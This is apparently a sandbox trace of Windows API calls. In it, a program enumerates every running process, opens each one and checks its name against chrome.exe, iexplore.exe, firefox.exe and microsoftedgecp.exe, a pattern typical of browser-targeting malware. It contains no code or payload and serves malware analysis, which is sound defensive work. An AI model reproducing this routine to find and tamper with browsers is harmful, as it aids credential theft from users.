	[0216.492] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.493] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.493] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0216.494] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x4864
	[0216.494] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.494] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0216.494] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.494] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.494] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.495] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0216.495] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.495] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.495] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0216.496] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x4868
	[0216.496] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.496] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0216.496] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.497] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.497] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.497] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0216.498] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.498] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.498] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0216.499] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x486c
	[0216.499] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.499] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0216.499] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.499] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.500] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.500] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0216.500] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.500] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.500] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0216.501] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x4870
	[0216.501] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.501] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0216.502] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.502] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.502] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.502] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0216.502] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.502] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.502] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0216.503] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x4874
	[0216.503] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.503] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0216.504] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.504] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.504] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.504] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0216.504] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.504] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.505] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0216.505] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x4878
	[0216.505] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.505] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0216.506] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.506] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.506] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.506] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0216.506] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.506] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.506] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0216.507] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x487c
	[0216.507] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.507] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0216.507] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.507] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.508] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.508] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0216.508] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.508] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.508] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.509] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x4880
	[0216.509] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.509] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.509] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.509] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.510] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.510] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.510] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.510] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.510] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.511] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x4884
	[0216.511] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.511] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.511] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.511] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.512] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.512] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.512] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.512] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.512] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.513] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x4888
	[0216.513] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.513] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.514] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.514] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.514] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.514] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.514] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.514] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.515] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.515] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x488c
	[0216.515] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.515] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.516] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.516] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.516] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.516] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.516] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.516] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.517] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.517] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x4890
	[0216.517] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.517] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.518] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.518] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.518] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.518] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.518] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.518] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.519] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.519] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x4894
	[0216.519] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.519] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.520] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.520] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.520] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.520] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.520] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.520] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.520] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.521] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x4898
	[0216.521] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.521] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.522] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.522] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.522] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.522] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.522] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.522] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.522] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0216.523] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x489c
	[0216.523] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.523] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0216.524] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.524] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.524] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.524] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0216.524] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.524] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.524] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.525] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x48a0
	[0216.525] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.525] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.526] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.526] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.526] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.526] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.526] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.526] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.526] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0216.527] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x48a4
	[0216.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.527] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.528] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.528] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.528] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.528] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.528] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.528] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0216.529] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x48a8
	[0216.530] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.530] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0216.530] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.530] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.530] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.530] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0216.531] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.531] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.531] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.532] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x48ac
	[0216.532] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.532] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.532] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.532] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.532] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.532] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.533] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.533] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.533] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0216.534] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x48b0
	[0216.534] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.534] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0216.534] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.534] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.534] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.534] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0216.535] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.535] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.535] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0216.536] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x48b4
	[0216.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.536] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0216.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.536] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.536] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0216.537] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.537] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.537] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0216.538] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x48b8
	[0216.538] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.538] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0216.538] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.538] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.538] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.538] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0216.538] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.538] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.539] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0216.539] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x48bc
	[0216.539] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.539] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0216.540] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.540] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.540] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.540] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0216.540] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.540] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.541] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0216.541] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0216.541] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0216.542] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x48c0
	[0216.542] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.542] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0216.543] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.543] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.543] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.543] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0216.544] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.544] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.544] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0216.545] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x48c4
	[0216.545] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
